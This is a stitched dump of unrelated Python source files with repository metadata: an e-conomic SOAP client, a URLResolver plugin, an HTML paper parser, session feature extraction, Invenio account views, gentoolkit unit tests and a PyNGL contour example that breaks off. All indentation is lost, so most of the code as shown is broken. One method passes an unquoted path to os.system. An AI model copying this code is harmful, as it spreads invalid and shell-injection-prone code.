def upgrade_to_invoice(self, handle, current_invoice_model):
hnd = self.fetch('Order_UpgradeToInvoice', handle)
return self.model_factory.get_or_create_instance(self, current_invoice_model, hnd)
def book_invoice(self, handle, invoice_model):
hnd = self.fetch('CurrentInvoice_Book', handle)
return self.model_factory.get_or_create_instance(self, invoice_model, hnd)
def next_available_number(self, model):
return self.fetch('%s_GetNextAvailableNumber' % model.__name__)
def delete(self, model, handle):
self.fetch("%s_Delete" % model.__name__, handle)
def create(self, model, **data):
parsed_data = self.codec.encode_data_object(self, model, data)
hnd = self.fetch("%s_CreateFromData" % model.__name__, parsed_data)
return self.get_instance(model, hnd)
def get_or_create(self, model, **spec):
filter_names = [f['name'] for f in model.__filters__]
get_data = dict((k, v,) for k, v in spec.items() if k in filter_names)
try:
return self.get(model, **get_data)
except ObjectDoesNotExist:
return self.create(model, **spec)
def __find_handles(self, model, **spec):
""" find model instances based on given filter (spec)
The filter is based on available server-calls, so some values might not be available for filtering.
Multiple filter-values is going to do multiple server-calls.
For complex filters in small datasets, it might be faster to fetch all and do your own in-memory filter.
Empty filter will fetch all.
:param model: subclass of EConomicsModel
:param spec: mapping of values to filter by
:return: a list of EConomicsModel instances
"""
server_calls = []
filter_names = dict([(f['name'], f['method'],) for f in model.get_filters()])
if not spec:
server_calls.append({'method': "%s_GetAll" % model.__name__, 'args': []})
else:
for key, value in spec.items():
if not key in filter_names:
raise ValueError("no server-method exists for filtering by '%s'" % key)
args = []
if not hasattr(value, '__iter__'):
value = [value]
if key.endswith('_list'):
vtype = type(value[0]).__name__
# TODO: this surely does not cover all cases of data types
array = self.soap_factory.create('ArrayOf%s' % vtype.capitalize())
getattr(array, "%s" % vtype).extend(value)
args.append(array)
else:
args.extend(value)
method = "%s_%s" % (model.__name__, filter_names[key])
if filter_names[key].startswith('GetAll'):
args = []
server_calls.append({'method': method, 'args': args, 'expect': "%sHandle" % model.__name__})
handles = [
map(Handle, self.fetch_list(scall['method'], scall.get('expect'), *scall['args']))
for scall in server_calls
]
return [h.wsdl for h in reduce(set.intersection, map(set, handles))]
def find(self, model, **spec):
handles = self.__find_handles(model, **spec)
return [self.get_instance(model, hnd) for hnd in handles]
def get(self, model, **spec):
"""get a single model instance by handle
:param model: model
:param handle: instance handle
:return:
"""
handles = self.__find_handles(model, **spec)
if len(handles) > 1:
raise MultipleObjectsReturned()
if not handles:
raise ObjectDoesNotExist()
return self.get_instance(model, handles[0])
def get_instance(self, model, handle):
return self.model_factory.get_or_create_instance(self, model, handle)
def load_instance_data(self, instance):
model = instance.__class__
modelname = model.__name__
data = self.fetch("%s_GetData" % modelname, instance._handle)
instance._data = self.codec.decode_data_object(self, instance._handle, model, data)
def load_data(self, instance):
model = instance.__class__
modelname = model.__name__
handles = [inst._handle for (m, inst,) in self.model_factory.instances_iter([model], loaded=False)]
array = self.soap_factory.create('ArrayOf%sHandle' % modelname)
getattr(array, "%sHandle" % modelname).extend(handles)
for data in self.fetch_list("%s_GetDataArray" % modelname, None, array):
handle = data.Handle
inst = self.get_instance(model, handle)
inst._data = self.codec.decode_data_object(self, handle, model, data)
inst._loaded = True
def get_all_changes(self):
changesets = defaultdict(list)
for model, inst in self.model_factory.instances_iter(updated=True):
changesets[model].append(ModelChange(model, inst))
return changesets
def commit(self):
changesets = self.get_all_changes()
for model, changes in changesets.items():
datalist = [self.codec.encode_data_object(self, model, changeset.get_data()) for changeset in changes]
array = self.soap_factory.create('ArrayOf%sData' % model.__name__)
getattr(array, '%sData' % model.__name__).extend(datalist)
self.fetch("%s_UpdateFromDataArray" % model.__name__, array)
[change.apply_and_clear() for change in changes]
def __getattr__(self, name):
return getattr(self.service, name)
class ModelChange(object):
def __init__(self, model, instance):
self.model = model
self.instance = instance
def __repr__(self):
return "<Changes %r %r>" % (self.instance, self.clean_data(self.instance._changes))
def apply_and_clear(self):
self.instance._data.update(self.instance._changes)
self.instance._changes = {}
def clean_data(self, data):
result = {}
for k, v in data.items():
k = pythonize(k)
if k.endswith('_handle'):
k = k[:-7]
result[k] = v
return result
def get_data(self):
if not self.instance._data:
self.instance.fetch()
data = self.clean_data(self.instance._data)
data.update(self.clean_data(self.instance._changes))
data['Handle'] = self.instance._handle
return data
class PropertyCodec(object):
def __init__(self, missing_value=None):
self.missing_value = missing_value
def decode_data_object(self, service, handle, model, data):
decoded_data = {}
for prop in model.properties:
name = prop.name
if prop.name+'Handle' in data:
name = prop.name + 'Handle'
if not name in data:
value = prop.default_value(service, handle)
else:
value = prop.decode_value(service, handle, data[name])
decoded_data[prop.name] = value
return decoded_data
def encode_data_object(self, service, model, data):
#print 'ENCODE', data
encoded_data = {}
if 'Handle' in data:
encoded_data['Handle'] = data['Handle']
for prop in model.properties:
name = prop.pyname
if not name in data:
# encoded_data[prop.name] = self.missing_value
continue
value = data[name]
if value is None:
# encoded_data[prop.name] = value
continue
encoded_data[prop.name] = prop.encode_value(service, data[name])
return encoded_data
class EConomicsModelFactory(object):
def __init__(self):
self.__models = {}
def instances_iter(self, models=None, loaded=None, updated=None):
if models is None:
models = self.__models.keys()
for model in models:
for inst in self.__models[model].values():
if loaded is not None and bool(inst._loaded) != bool(loaded):
continue
if updated is not None and bool(inst._changes) != bool(updated):
continue
yield (model, inst,)
def get_or_create_instance(self, service, model, handle):
hashkey = hash((service, model, handle[0],))
modeldata = self.__models.setdefault(model, {})
return modeldata.setdefault(hashkey, model(service, handle))
class Handle(object):
def __init__(self, wsdl):
self.wsdl = wsdl
def __hash__(self):
return hash(self.wsdl[0])
def __eq__(self, other):
return hash(self) == other
def __repr__(self):
return "<Handle %r>" % self.wsdl.Id
class EConomicsMeta(type):
registry = {}
def __new__(mcs, name, bases, ns):
properties = []
for k, v in ns.items():
if hasattr(v, '__get__'):
properties.append(v)
ns['properties'] = properties
model = type.__new__(mcs, name, bases, ns)
mcs.registry[name] = model
return model
def get_filters(self):
return self.__filters__
class EConomicsBaseProperty(object):
def encode_value(self, service, value):
return value
def decode_value(self, service, handle, value):
return value
def default_value(self, service, handle):
return None
def __get__(self, instance, owner):
_ = owner
if instance is None:
return self
changes = instance._changes
if self.name in changes:
return changes[self.name]
if not instance._loaded:
instance.load()
value = instance._data[self.name]
if hasattr(value, 'fetched') and not value.fetched:
value.fetch()
return value
def __set__(self, instance, value):
instance._changes[self.name] = value
class EConomicsProperty(EConomicsBaseProperty):
def __init__(self, name):
self.name = name
self.pyname = pythonize(name)
def __repr__(self):
return "<%s Data>" % pythonize(self.name)
class EConomicsReference(EConomicsBaseProperty):
def __init__(self, name, model):
self.name = name + 'Handle'
self.model = model
self.pyname = pythonize(name)
def encode_value(self, service, value):
return value._handle
def decode_value(self, service, handle, value):
return service.get_instance(get_model(self.model), value)
def __repr__(self):
return "<%s %s>" % (self.name, self.model)
class QueryList(list):
def __init__(self, service, handle, model, method):
self.service = service
self.handle = handle
self.model = model
self.method = method
self.fetched = False
def __getattribute__(self, name):
if name in ['fetch', 'service', 'handle', 'model', 'method', 'fetched']:
return list.__getattribute__(self, name)
if self.fetched:
self.fetch()
return list.__getattribute__(self, name)
def fetch(self):
handles = self.service.fetch_list(self.method, None, self.handle)
self[:] = [self.service.get_instance(self.model, hnd) for hnd in handles]
self.fetched = True
return self
class EConomicsReferenceList(EConomicsBaseProperty):
def __init__(self, name, model, method):
self.name = name
self.model = model
self.method = method
self.pyname = pythonize(name)
def __repr__(self):
return "<%s [%s]>" % (self.name, self.model)
def encode_value(self, service, value):
return [v._handle for v in value]
def default_value(self, service, handle):
return QueryList(service, handle, get_model(self.model), self.method)
class EConomicsFileProperty(EConomicsBaseProperty):
def __init__(self, name, method, filetype):
self.name = name
self.filetype = filetype
self.method = method
self.pyname = pythonize(name)
def __repr__(self):
return "<%s %s file>" % (self.name, self.filetype)
def default_value(self, service, handle):
return FileObject(service, self.method, handle, self.filetype)
class FileObject(object):
def __init__(self, service, method, handle, filetype):
self.filedata = None
self.method = method
self.service = service
self.handle = handle
self.filetype = filetype
self.fetched = False
self.__last_location = None
def fetch(self):
self.filedata = self.service.fetch(self.method, self.handle)
self.fetched = True
return self
def save(self, location):
if not location.endswith(self.filetype):
location += '.' + self.filetype
with open(location, 'wb') as f:
f.write(base64.b64decode(self.filedata))
self.__last_location = location
def show(self):
if not self.__last_location:
self.save('/tmp/economic_tmp')
os.system('xdg-open %s' % self.__last_location)
class EConomicsModel(object):
__filters__ = []
__metaclass__ = EConomicsMeta
def __init__(self, service, handle):
self._handle = handle
self._loaded = False
self._service = service
self._data = {}
self._changes = {}
def __repr__(self):
return "<%s %s>" % (self.__class__.__name__, self._handle[0])
def fetch(self):
self._service.load_instance_data(self)
return self
def update(self, **data):
for k, v in data.items():
setattr(self, k, v)
def load(self):
self._service.load_data(self)
def delete(self):
self._service.delete(self.__class__, self._handle)
def get_model(name):
return EConomicsMeta.registry[name]
def pythonize(name):
return re.sub('([A-Z])([a-z])', r'_\1\2', name).strip('_').lower()
def camelcase(name):
return ''.join(map(str.capitalize, name.split('_')))
def build_model_code(client):
"""
Generate source code for e-conomic models based on WSDL connection.
This is based on the assumption that the API follows a specific method naming-convention.
Not all models and attributes has been tested.
The source-generation is mostly to help improve readability and IDE auto-completion.
:param client:
:return: source code for models.py
"""
models = {}
references = {}
for method in client.wsdl.services[0].ports[0].methods.values():
if not '_' in method.name:
continue
model, action = method.name.split('_')
models.setdefault(model, {'properties': [], 'filters': []})
references[model] = model
if model[-1] == 'y':
references[model[:-1] + 'ies'] = model
else:
references[model+'s'] = model
references['OurReference'] = 'Employee'
references['GetYourReference'] = 'DebtorContact'
references['GetAttention'] = 'DebtorContact'
references['Layout'] = 'TemplateCollection'
special = {
'Order_GetPdf': {
'type': 'EConomicsFileProperty',
'args': ["'Order_GetPdf'", "'pdf'"]
},
'Invoice_GetPdf': {
'type': 'EConomicsFileProperty',
'args': ["'Invoice_GetPdf'", "'pdf'"]
},
'CurrentInvoice_GetPdf': {
'type': 'EConomicsFileProperty',
'args': ["'CurrentInvoice_GetPdf'", "'pdf'"]
}
}
for line in ['Order', 'Invoice', 'CurrentInvoice', 'Quotation']:
method = '%s_GetLines' % line
special[method] = {
'type': 'EConomicsReferenceList',
'args': ["'%sLine'" % line, "'%s'" % method]
}
for method in client.wsdl.services[0].ports[0].methods.values():
if not '_' in method.name:
continue
model, action = method.name.split('_')
if action in ['GetData', 'GetAll', 'GetDataArray']:
continue
modeldata = models[model]
if action == 'GetAllUpdated':
camelname = action[3:]
modeldata['filters'].append({'name': pythonize(camelname), 'method': action})
if re.findall('GetAll[A-Z].+', action):
camelname = action[3:]
modeldata['filters'].append({'name': pythonize(camelname), 'method': action})
elif action.startswith('FindBy'):
camelname = action[6:]
modeldata['filters'].append({'name': pythonize(camelname), 'method': action})
elif action.startswith('Get'):
propname = action[3:]
pyname = pythonize(propname)
if not propname:
continue
get_type = re.findall('Get(%s)[a-z0-9]*?$' % ('|'.join(references.keys())), action)
if get_type and get_type[0] in references:
refmodel = references[get_type[0]]
if action[-1] == 's':
modeldata['properties'].append({
'type': 'EConomicsReferenceList',
'args': ["'%s'" % propname, "'%s'" % refmodel, "'%s'" % method.name],
'name': pyname
})
else:
modeldata['properties'].append({
'type': 'EConomicsReference',
'args': ["'%s'" % propname, "'%s'" % refmodel],
'name': pyname
})
elif method.name in special:
spdata = special[method.name]
modeldata['properties'].append({
'type': spdata['type'],
'args': ["'%s'" % propname] + spdata['args'],
'name': pyname
})
else:
modeldata['properties'].append({
'type': 'EConomicsProperty',
'args': ["'%s'" % propname],
'name': pyname
})
classes = []
for modelname, modeldata in models.items():
propertycode = ["%s = %s(%s)" % (md['name'], md['type'], ', '.join(md['args']))
for md in modeldata['properties']]
code = "class %s(%s):\n __filters__ = %r\n %s" % (modelname, 'EConomicsModel',
modeldata['filters'], '\n '.join(propertycode))
classes.append(code)
return "from pyconomic.base import *\n\n\n" + "\n\n\n".join(classes)
|
mikkeljans/pyconomic
|
pyconomic/base.py
|
Python
|
gpl-2.0
| 19,899
|
'''
Plugin for URLResolver
Copyright (C) 2016 Gujal
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
'''
from urlresolver.plugins.__generic_resolver__ import GenericResolver
class PutLoadResolver(GenericResolver):
name = "putload.tv"
domains = ["putload.tv", "shitmovie.com"]
pattern = r'(?://|\.)(putload\.tv|shitmovie\.com)/(?:embed-)?([0-9a-zA-Z]+)'
|
dknlght/dkodi
|
src/script.module.urlresolver/lib/urlresolver/plugins/putload.py
|
Python
|
gpl-2.0
| 979
|
from bs4 import BeautifulSoup
html_doc = open('../Dataset/CVPR 2011/5995308_full_text.xml', 'rb')
soup = BeautifulSoup(html_doc, 'html.parser')
# print(soup.prettify())
# print soup.title
# print soup.title.string
## extract article
article = soup.find(id = 'article')
## extract all sections
sections_list = []
for sec in article.find_all('div', class_ = 'section'):
sections_list.append(sec)
print sections_list[0]
## extract section title and content
for sec in sections_list:
kicker = sec.find(class_ = 'kicker').string
title = sec.h2.text
print title
# title = ''
# for sub_title in sec.h2.contents:
# title += sub_title.string
# # remove all a tags from section
# for a in sec.find_all('a'):
# a.decompose()
content = ''
for paragraph in sec.find_all('p'):
content += paragraph.text
print content
# if sec == sections_list[len(sections_list) - 1]:
# # extract acknowledgement
# if sec.next_sibling:
# acknowledgement = sec.next_sibling.string
# print acknowledgement
## extract related articles
related_articles = soup.find(id = 'related-articles')
## extract article information
article_information = soup.find(id = 'left-panel')
## extract article information
article_data = soup.find(id = 'article-data')
# footnotes
# foot_notes_tag = article_data.find(id = 'footnotes')
# if foot_notes_tag is not None:
# foot_notes = []
# for foot_note in foot_notes_tag.find_all('p'):
# foot_notes.append(foot_note.text)
# print foot_notes
# references
# references_tag = article_data.find(id = 'references')
# if references_tag is not None:
# references = []
# for reference in references_tag.find_all(class_ = 'ref'):
# references.append(reference.select_one('.body').text)
# for refrence in references:
# print refrence
# authors
# authors_tag = article_data.find(id = 'authors')
# if authors_tag is not None:
# authors = []
# for author in authors_tag.find_all(class_ = 'author'):
# author_image = author.find('img')['src']
# author_link = author.find('a')['href']
# author_bio = author.select_one('.bio').text
# authors.append({'image' : author_image,
# 'link' : author_link,
# 'bio' : author_bio
# })
# # print authors
#
# # citedby
# citedby_tag = article_data.find(id = 'citedby')
# if citedby_tag is not None:
# citedby = []
# for cityby_i in citedby_tag.find_all(class_ = 'ref ieee'):
# pass
#
# # keywords
# keywords_tag = article_data.find(id = 'keywords')
# if keywords_tag is not None:
# keywords = []
# for keywords_i in keywords_tag.find_all(class_ = 'block'):
# keyword_type = keywords_i.h3.text
# print keyword_type
# _keywords = []
# for keyword_link in keywords_i.find_all('a'):
# _keywords.append(keyword_link.text)
# keywords.append({keyword_type: _keywords})
# print keywords
# else:
# print None
# for para in soup.find(id='sec1').find_all('p'):
# para.a.extract()
# for para in soup.find(id='sec1').find_all('p'):
# print para
|
lidalei/IR-Project
|
src/CrawlDataset/Xml_Parse.py
|
Python
|
gpl-2.0
| 3,258
|
#! /usr/local/bin/python3
# -*- utf-8 -*-
"""
Total: 45
0: number of 3-hour defined sessions in the enrollment
1~4: average, standard deviation, maximal, minimal numbers of events in
3-hour defined sessions in the enrollment
5~8: statistics of 3-hour defined sessions: mean, std, max, min of duration
9: number of 1-hour defined sessions in the enrollment
10~13: average, standard deviation, maximal, minimal numbers of events in
1-hour defined sessions in the enrollment
14~17: statistics of 1-hour defined sessions: mean, std, max, min of duration
18: number of 12-hour defined sessions in the enrollment
19~22: average, standard deviation, maximal, minimal numbers of events in
12-hour defined sessions in the enrollment
23~26: statistics of 12-hour defined sessions: mean, std, max, min of duration
27: number of 1-day defined sessions in the enrollment
28~31: average, standard deviation, maximal, minimal numbers of events in
1-day defined sessions in the enrollment
32~35: statistics of 1-day defined sessions: mean, std, max, min of duration
36: number of 7-day defined sessions in the enrollment
37~40: average, standard deviation, maximal, minimal numbers of events in
7-day defined sessions in the enrollment
41~44: statistics of 7-day defined sessions: mean, std, max, min of duration
"""
import logging
import sys
import os
from datetime import timedelta
import multiprocessing as par
import numpy as np
import pandas as pd
import IO
import Path
import Util
logging.basicConfig(stream=sys.stdout, level=logging.DEBUG,
format='%(asctime)s %(name)s %(levelname)s\t%(message)s')
logger = logging.getLogger(os.path.basename(__file__))
def __get_features__(param):
log_all, dt = param
logger.debug('getting features of timedelta(%s)', dt)
X = sessions_of(log_all, dt)
logger.debug('got features of timedelta(%s)', dt)
return dt, X
def extract(base_date):
pkl_path = Path.of_cache('sessions.%s.pkl' % base_date)
X = IO.fetch_cache(pkl_path)
if X is not None:
logger.debug('cache hit')
return X
logger.debug('cache missed')
logger.debug('prepare datasets ...')
enroll_all = IO.load_enrollments()
log_all = IO.load_logs()
log_all = log_all[log_all['time'] <= base_date]
logger.debug('datasets prepared')
check_dataframe = Util.dataframe_checker(logger)
n_proc = par.cpu_count()
params = [(log_all, dt)
for dt in [timedelta(hours=3), timedelta(hours=1),
timedelta(hours=12), timedelta(days=1),
timedelta(days=7)]]
log_problem = log_all[log_all['event'] == 'problem']
params += [(log_problem, dt)
for dt in [timedelta(hours=3), timedelta(hours=1)]]
pool = par.Pool(processes=min(n_proc, len(params)))
X = enroll_all
for dt, X_ in pool.map(__get_features__, params):
check_dataframe(X_, str(dt))
X = pd.merge(X, X_, how='left', on='enrollment_id')
pool.close()
pool.join()
del X['username']
del X['course_id']
X.fillna(0, inplace=True)
check_dataframe(X, 'X')
IO.cache(X, pkl_path)
return X
def sessions_of(log_all, delta_t):
def __session__(group):
group_t = group['time'].sort(inplace=False).reset_index(drop=True)
dt = (group_t[1:].reset_index() - group_t[:-1].reset_index())['time']
session_break = dt > delta_t
breaks_indices = session_break[session_break].index.values
sessions_indices = []
i = 0
for b in breaks_indices:
if b < i:
i += 1
else:
sessions_indices.append((i, b))
i = b + 1
if i < len(group_t):
sessions_indices.append((i, len(group_t) - 1))
feature = [len(sessions_indices)]
indices = ['count']
nums_of_events = [j - i + 1 for i, j in sessions_indices]
feature += [f(nums_of_events)
for f in [np.average, np.std, np.max, np.min]]
indices += ['ec_' + i for i in ['mean', 'std', 'max', 'min']]
sessions = pd.DataFrame(
[(group_t[i], group_t[j]) for i, j in sessions_indices],
columns=['st', 'et'])
duration_ratio = (sessions['et'] - sessions['st']) / delta_t
feature += [f(duration_ratio) for
f in [np.average, np.std, np.max, np.min]]
indices += ['dr_' + i for i in ['mean', 'std', 'max', 'min']]
return pd.Series(feature, index=indices)
return log_all.groupby('enrollment_id').apply(__session__).reset_index()
|
Divergent914/yakddcup2015
|
sessions.py
|
Python
|
gpl-2.0
| 4,628
|
#!/usr/bin/env python
#-*- encoding: utf-8 -*-
import random
list_names = ["ivan","foo","bar","mary","peter"]
random.shuffle(list_names)
print 'You are winner: < %s >' % (random.choice(list_names))
|
iv4nelson/apps_tigd
|
sorted_random.py
|
Python
|
gpl-2.0
| 203
|
# -*- coding: utf-8 -*-
#
# This file is part of Invenio.
# Copyright (C) 2014, 2015 CERN.
#
# Invenio is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 2 of the
# License, or (at your option) any later version.
#
# Invenio is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Invenio; if not, write to the Free Software Foundation, Inc.,
# 59 Temple Place, Suite 330, Boston, MA 02111-1307, USA.
"""GitHub Settings Blueprint."""
from __future__ import absolute_import
from flask import Blueprint, render_template, redirect, url_for, request, \
flash, g
from flask_login import login_required, current_user
from flask_breadcrumbs import register_breadcrumb
from flask_menu import register_menu, current_menu
from invenio.base.i18n import _
from invenio.ext.sslify import ssl_required
from invenio.ext.login import reset_password
from ..forms import ChangePasswordForm, LostPasswordForm, ProfileForm, \
VerificationForm
from ..models import User
blueprint = Blueprint(
'accounts_settings',
__name__,
url_prefix="/account/settings",
static_folder="../static",
template_folder="../templates",
)
@blueprint.before_app_first_request
def register_menu_items():
"""Register empty account breadcrumb."""
item = current_menu.submenu('breadcrumbs.settings')
item.register('', _('Account'))
@blueprint.route("/")
@ssl_required
@login_required
def index():
"""Index page."""
return redirect(url_for(".profile"))
@blueprint.route("/profile", methods=['GET', 'POST'])
@ssl_required
@login_required
@register_menu(
blueprint, 'settings.profile',
_('%(icon)s Profile', icon='<i class="fa fa-user fa-fw"></i>'),
order=0,
active_when=lambda: request.endpoint.startswith("accounts_settings.")
)
@register_breadcrumb(blueprint, 'breadcrumbs.settings.profile', _('Profile'))
def profile():
"""Change password form for authenticated users."""
u = User.query.filter_by(id=current_user.get_id()).first()
profile_form = ProfileForm(formdata=None, obj=u, prefix="profile")
verification_form = VerificationForm(formdata=None, prefix="verification")
password_form = ChangePasswordForm(formdata=None, prefix="password")
form = request.form.get('submit', None)
if form == 'password':
password_form.process(formdata=request.form)
if password_form.validate_on_submit():
u.password = password_form.data['password']
flash(_("Password changed."), category="success")
elif form == 'profile':
profile_form.process(formdata=request.form)
if profile_form.validate_on_submit():
changed_attrs = u.update_profile(profile_form.data)
if 'email' in changed_attrs:
flash(_("Profile updated. We have sent a verification email to"
" %(email)s. Please check it.", email=u.email),
category="success")
elif changed_attrs:
flash(_("Profile updated."), category="success")
else:
flash(_("No changes to profile."), category="success")
elif form == 'verification':
verification_form.process(formdata=request.form)
if verification_form.validate_on_submit():
if u.verify_email():
flash(_("Verification email sent."), category="success")
return render_template(
"accounts/settings/profile.html",
password_form=password_form,
profile_form=profile_form,
verification_form=verification_form,
user=u,
)
@blueprint.route("/profile/lost", methods=['GET', 'POST'])
@ssl_required
@login_required
@register_breadcrumb(
blueprint, 'breadcrumbs.settings.profile.lost', _('Lost password')
)
def lost():
"""Lost password form for authenticated users."""
form = LostPasswordForm(request.form)
if form.validate_on_submit():
if reset_password(form.data['email'], g.ln):
flash(_('A password reset link has been sent to %(whom)s',
whom=request.values['email']), 'success')
return redirect(url_for('.profile'))
return render_template(
"accounts/settings/lost.html",
form=form,
)
|
zenodo/invenio
|
invenio/modules/accounts/views/settings.py
|
Python
|
gpl-2.0
| 4,581
|
#!/usr/bin/python
#
# Copyright(c) 2009, Gentoo Foundation
#
# Licensed under the GNU General Public License, v2
#
# $Header$
import unittest
from gentoolkit.cpv import CPV, compare_strs
from gentoolkit.test import cmp
class TestGentoolkitCPV(unittest.TestCase):
def assertEqual2(self, o1, o2):
# logic bugs hidden behind short circuiting comparisons for metadata
# is why we test the comparison *both* ways.
self.assertEqual(o1, o2)
c = cmp(o1, o2)
self.assertEqual(c, 0,
msg="checking cmp for %r, %r, aren't equal: got %i" % (o1, o2, c))
self.assertEqual(o2, o1)
c = cmp(o2, o1)
self.assertEqual(c, 0,
msg="checking cmp for %r, %r,aren't equal: got %i" % (o2, o1, c))
def assertNotEqual2(self, o1, o2):
# is why we test the comparison *both* ways.
self.assertNotEqual(o1, o2)
c = cmp(o1, o2)
self.assertNotEqual(c, 0,
msg="checking cmp for %r, %r, not supposed to be equal, got %i"
% (o1, o2, c))
self.assertNotEqual(o2, o1)
c = cmp(o2, o1)
self.assertNotEqual(c, 0,
msg="checking cmp for %r, %r, not supposed to be equal, got %i"
% (o2, o1, c))
def test_comparison(self):
self.assertEqual2(CPV('pkg'), CPV('pkg'))
self.assertNotEqual2(CPV('pkg'), CPV('pkg1'))
self.assertEqual2(CPV('cat/pkg'), CPV('cat/pkg'))
self.assertNotEqual2(CPV('cat/pkg'), CPV('cat/pkgb'))
self.assertNotEqual2(CPV('cata/pkg'), CPV('cat/pkg'))
self.assertEqual2(CPV('cat/pkg-0.1'), CPV('cat/pkg-0.1'))
self.assertNotEqual2(CPV('cat/pkg-1.0'), CPV('cat/pkg-1'))
self.assertEqual2(CPV('cat/pkg-0'), CPV('cat/pkg-0'))
self.assertEqual2(CPV('cat/pkg-1-r1'), CPV('cat/pkg-1-r1'))
self.assertNotEqual2(CPV('cat/pkg-2-r1'), CPV('cat/pkg-2-r10'))
self.assertEqual2(CPV('cat/pkg-1_rc2'), CPV('cat/pkg-1_rc2'))
self.assertNotEqual2(CPV('cat/pkg-2_rc2-r1'), CPV('cat/pkg-2_rc1-r1'))
def test_compare_strs(self):
# Test ordering of package strings, Portage has test for vercmp,
# so just do the rest
version_tests = [
# different categories
('sys-apps/portage-2.1.6.8', 'sys-auth/pambase-20080318'),
# different package names
('sys-apps/pkgcore-0.4.7.15-r1', 'sys-apps/portage-2.1.6.8'),
# different package versions
('sys-apps/portage-2.1.6.8', 'sys-apps/portage-2.2_rc25')
]
# Check less than
for vt in version_tests:
self.assertTrue(compare_strs(vt[0], vt[1]) == -1)
# Check greater than
for vt in version_tests:
self.assertTrue(compare_strs(vt[1], vt[0]) == 1)
# Check equal
vt = ('sys-auth/pambase-20080318', 'sys-auth/pambase-20080318')
self.assertTrue(compare_strs(vt[0], vt[1]) == 0)
def test_chunk_splitting(self):
all_tests = [
# simple
('sys-apps/portage-2.2', {
'category': 'sys-apps',
'name': 'portage',
'cp': 'sys-apps/portage',
'version': '2.2',
'revision': '',
'fullversion': '2.2'
}),
# with rc
('sys-apps/portage-2.2_rc10', {
'category': 'sys-apps',
'name': 'portage',
'cp': 'sys-apps/portage',
'version': '2.2_rc10',
'revision': '',
'fullversion': '2.2_rc10'
}),
# with revision
('sys-apps/portage-2.2_rc10-r1', {
'category': 'sys-apps',
'name': 'portage',
'cp': 'sys-apps/portage',
'version': '2.2_rc10',
'revision': 'r1',
'fullversion': '2.2_rc10-r1'
}),
# with dash (-) in name (Bug #316961)
('c-portage', {
'category': '',
'name': 'c-portage',
'cp': 'c-portage',
'version': '',
'revision': '',
'fullversion': ''
}),
# with dash (-) in name (Bug #316961)
('sys-apps/c-portage-2.2_rc10-r1', {
'category': 'sys-apps',
'name': 'c-portage',
'cp': 'sys-apps/c-portage',
'version': '2.2_rc10',
'revision': 'r1',
'fullversion': '2.2_rc10-r1'
}),
]
for test in all_tests:
cpv = CPV(test[0])
keys = ('category', 'name', 'cp', 'version', 'revision', 'fullversion')
for k in keys:
self.assertEqual(
getattr(cpv, k), test[1][k]
)
def test_main():
suite = unittest.TestLoader().loadTestsFromTestCase(TestGentoolkitCPV)
unittest.TextTestRunner(verbosity=2).run(suite)
test_main.__test__ = False
if __name__ == '__main__':
test_main()
|
zmedico/gentoolkit
|
pym/gentoolkit/test/test_cpv.py
|
Python
|
gpl-2.0
| 4,141
|
"""
NCL User Guide Python Example: PyNGL_unstructured_contour_cellfill.py
- unstructured data (ICON)
- contour plot
- CellFill
05.06.15 kmf
"""
import numpy as np
import math, time
import sys,os
import Ngl,Nio
#----------------------
#-- MAIN
#----------------------
t1 = time.time() #-- retrieve start time
print ""
#-- define variables
diri = "./" #-- data path
fname = "ta_ps_850.nc" #-- data file
gname = "r2b4_amip.nc" #-- grid info file
#---Test if files exist
if(not os.path.exists(diri+fname) or not os.path.exists(diri+gname)):
print("You do not have the necessary files to run this example, '%s' and '%s'." % (diri+fname,diri+gname))
print("You can get the files from the NCL website at:")
print("http://www.ncl.ucar.edu/Document/Manuals/NCL_User_Guide/Data/")
sys.exit()
#-- open file and read variables
f = Nio.open_file(diri + fname,"r") #-- add data file
g = Nio.open_file(diri + gname,"r") #-- add grid file (not contained in data file!!!)
#-- read a timestep of "ta"
var = f.variables["ta"][0,0,:] #-- first time step, lev, ncells
print "-----------------------"
print f.variables["ta"] #-- like printVarSummary
print "-----------------------"
title = "ICON: Surface temperature" #-- title string
varMin = 230 #-- data minimum
varMax = 310 #-- data maximum
varInt = 2 #-- data increment
levels = range(varMin,varMax,varInt) #-- set levels array
#-------------------------------------------------------------------
#-- define the x-, y-values and the polygon points
#-------------------------------------------------------------------
rad2deg = 45./np.arctan(1.) #-- radians to degrees
x = g.variables["clon"][:] #-- read clon
y = g.variables["clat"][:] #-- read clat
vlon = g.variables["clon_vertices"][:] #-- read clon_vertices
vlat = g.variables["clat_vertices"][:] #-- read clat_vertices
ncells = vlon.shape[0] #-- number of cells
nv = vlon.shape[1] #-- number of edges
x = x * rad2deg #-- cell center, lon
y = y * rad2deg #-- cell center, lat
vlat = vlat * rad2deg #-- cell lattitude vertices
vlon = vlon * rad2deg #-- cell longitude vertices
#-- longitude values -180. - 180.
for j in range(1,ncells):
for i in range(1,nv):
if vlon[j,i] < -180. :
vlon[j,i] = vlon[j,i] + 360.
if vlon[j,i] > 180. :
vlon[j,i] = vlon[j,i] - 360.
#-- information
print ""
print "Cell points: ", nv
print "Cells: ", str(ncells)
print "Variable ta min/max: %.2f " % np.min(var) + "/" + " %.2f" % np.max(var)
print ""
#-- open a workstation
wks_type = "png"
wks = Ngl.open_wks(wks_type,"plot_contour_unstructured_ngl") #-- open a workstation
#-- set resources
res = Ngl.Resources() #-- plot mods desired.
res.nglDraw = False #-- turn off plot draw and frame advance. We will
res.nglFrame = False #-- do it later after adding subtitles.
res.cnFillOn = True #-- color plot desired
res.cnFillMode = "CellFill" #-- set fill mode
res.cnFillPalette = "BlueWhiteOrangeRed" #-- choose colormap
res.cnLinesOn = False #-- turn off contour lines
res.cnLineLabelsOn = False #-- turn off contour labels
res.cnLevelSelectionMode = "ExplicitLevels" #-- use explicit levels
res.cnLevels = levels #-- set levels
res.lbOrientation = "Horizontal" #-- vertical by default
res.lbBoxLinesOn = False #-- turn off labelbar boxes
